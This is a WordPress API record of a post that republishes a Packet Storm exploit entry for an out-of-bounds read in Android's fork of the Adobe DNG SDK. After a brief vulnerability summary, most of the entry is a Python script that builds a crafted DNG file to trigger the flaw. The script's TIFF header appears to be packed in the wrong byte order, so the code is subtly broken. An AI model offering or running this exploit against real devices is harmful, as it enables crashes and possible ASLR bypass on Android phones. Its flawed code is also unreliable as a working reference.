{"id":28578,"date":"2025-12-03T18:50:33","date_gmt":"2025-12-03T18:50:33","guid":{"rendered":"http:\/\/localhost\/?p=28578"},"modified":"2025-12-03T18:50:33","modified_gmt":"2025-12-03T18:50:33","slug":"adobe-dng-sdk-14-out-of-bounds-read","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=28578","title":{"rendered":"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-03T17:20:48&#8243;,&#8221;description&#8221;:&#8221;A vulnerability exists in Adobe DNG SDK (the fork used by Android) due to improper validation of the fAreaSpec fields inside the dng_opcode_DeltaPerRow::ProcessArea function. If an attacker supplies a crafted DNG file with an empty or malformed fAreaSpec,&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-03T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-03T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212379&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Adobe DNG SDK v1.4 (Android\u2019s fork) Out-of-Bounds Read                                                                      |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/cs.android.com\/android\/platform\/superproject\/                                 
                                      |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/207365\/\\n    \\n    [+] Summary : \\n                 \\n               A vulnerability exists in Adobe DNG SDK (the fork used by Android) due to improper validation of the fAreaSpec fields inside the dng_opcode_DeltaPerRow::ProcessArea function. \\n    \\t\\t   If an attacker supplies a crafted DNG file with an empty or malformed fAreaSpec, the SDK performs arithmetic that results in signed integer underflow. \\n    \\t\\t   This underflow leads to an out\u2011of\u2011bounds read when computing the lookup table pointer.\\n               Because the DNG SDK is widely used in Android\u2019s raw\u2011image pipeline (BuildImageStage2), the bug becomes reachable from remote contexts that process untrusted DNG images. \\n    \\t\\t   The vulnerability can result in a crash and may enable ASLR bypass, since observable differences in behavior depend on memory layout.\\n               Android has shipped this vulnerable DNG fork for over 12 years, affecting multiple generations of devices.\\n    \\n    [+] Affected Version : Adobe DNG SDK v1.4 (Android\u2019s fork)\\n    \\n    All Android versions using this fork, including:\\n    Android 15\\n    Android 14\\n    Android 13\\n    And earlier versions\\n    \\n    [+] POC : python poc.py ===\\u003e Python version to generate the malicious DNG:\\n    \\n    import struct\\n    \\n    def create_malicious_dng(filename):\\n        with open(filename, &#8216;wb&#8217;) as f:\\n            # TIFF Header\\n            f.write(struct.pack(&#8216;\\u003cI&#8217;, 0x49492A00))  # Little endian\\n            f.write(struct.pack(&#8216;\\u003cI&#8217;, 8))           # First IFD offset\\n            \\n            # IFD with 3 entries\\n            
f.write(struct.pack(&#8216;\\u003cH&#8217;, 3))  # 3 entries\\n            \\n            # Minimal required IFD entries\\n            entries = [\\n                (256, 4, 1, 64),     # ImageWidth\\n                (257, 4, 1, 64),     # ImageLength\\n                (51011, 7, 60, 128), # OpcodeList3 at offset 128\\n            ]\\n            \\n            for tag, type, count, value in entries:\\n                f.write(struct.pack(&#8216;\\u003cHHII&#8217;, tag, type, count, value))\\n            \\n            f.write(struct.pack(&#8216;\\u003cI&#8217;, 0))  # Next IFD (0 = end)\\n            \\n            # Write some dummy image data at offset 24\\n            f.seek(24)\\n            f.write(b&#8217;\\\\x00&#8242; * 100)\\n            \\n            # Write malicious opcode at offset 128\\n            f.seek(128)\\n            \\n            # DeltaPerRow opcode &#8211; 11 parameters total\\n            opcode_params = [\\n                0x0002,     # opcode_id: DeltaPerRow\\n                1,          # version\\n                0,          # flags\\n                100,        # top &#8211; VULNERABILITY TRIGGER\\n                0,          # left\\n                50,         # bottom &#8211; top \\u003e= bottom makes fAreaSpec empty\\n                64,         # right\\n                1,          # row_pitch\\n                1,          # col_pitch\\n                0,          # plane\\n                1           # planes\\n            ]\\n            \\n            # Pack each parameter individually to avoid format string issues\\n            for param in opcode_params:\\n                f.write(struct.pack(&#8216;\\u003cI&#8217;, param))\\n            \\n            # Table size and data\\n            table_size = 50  # Small table to ensure OOB read\\n            f.write(struct.pack(&#8216;\\u003cI&#8217;, table_size))\\n            \\n            # Write table data\\n            for i in range(table_size):\\n                
f.write(struct.pack(&#8216;\\u003cf&#8217;, 0.1))\\n            \\n        print(f\\&#8221;Malicious DNG created: {filename}\\&#8221;)\\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        create_malicious_dng(\\&#8221;poc.dng\\&#8221;)\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212379&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212379\/&#8221;,&#8221
;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-03T17:20:48&#8243;,&#8221;description&#8221;:&#8221;A vulnerability exists in Adobe DNG SDK (the fork used by Android) due to improper validation of the fAreaSpec fields inside the dng_opcode_DeltaPerRow::ProcessArea function. If&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-28578","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=28578\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379 - zero redgem\" \/>\n<meta property=\"og:description\" 
content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-03T17:20:48&#8243;,&#8221;description&#8221;:&#8221;A vulnerability exists in Adobe DNG SDK the fork used by Android due to improper validation of the fAreaSpec fields inside the dngopcodeDeltaPerRow::ProcessArea function. If...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=28578\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-03T18:50:33+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28578#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28578\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds 
Read_PACKETSTORM:212379\",\"datePublished\":\"2025-12-03T18:50:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28578\"},\"wordCount\":660,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28578#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28578\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28578\",\"name\":\"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-03T18:50:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28578#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28578\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28578#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero 
redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28578","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28578"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28578\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=28578"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=28578"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ft
ags&post=28578"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}